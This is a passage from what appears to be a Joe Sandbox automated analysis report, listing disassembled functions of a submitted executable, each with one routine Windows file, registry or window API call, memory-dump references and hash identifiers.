                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                    • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                    • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                    • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                    Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWrite
                                                                    • String ID:
                                                                    • API String ID: 390214022-0
                                                                    • Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                    • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                    • Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                    • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                    Function 00406132 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                    • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                    • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                    Function 00405E10 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                    • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                    • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                    Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                    • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                    • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                    Function 00406104 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,: Completed,?), ref: 00406128
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                    • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                    • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                    Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                    • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                    • Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                    • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                    Function 0040425A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                    • Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
                                                                    • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                    • Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D
                                                                    Function 00404243 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                    • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                    • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                    • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                    Function 00403324 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                    • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                    • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                    • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                    Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                    • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                                    • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
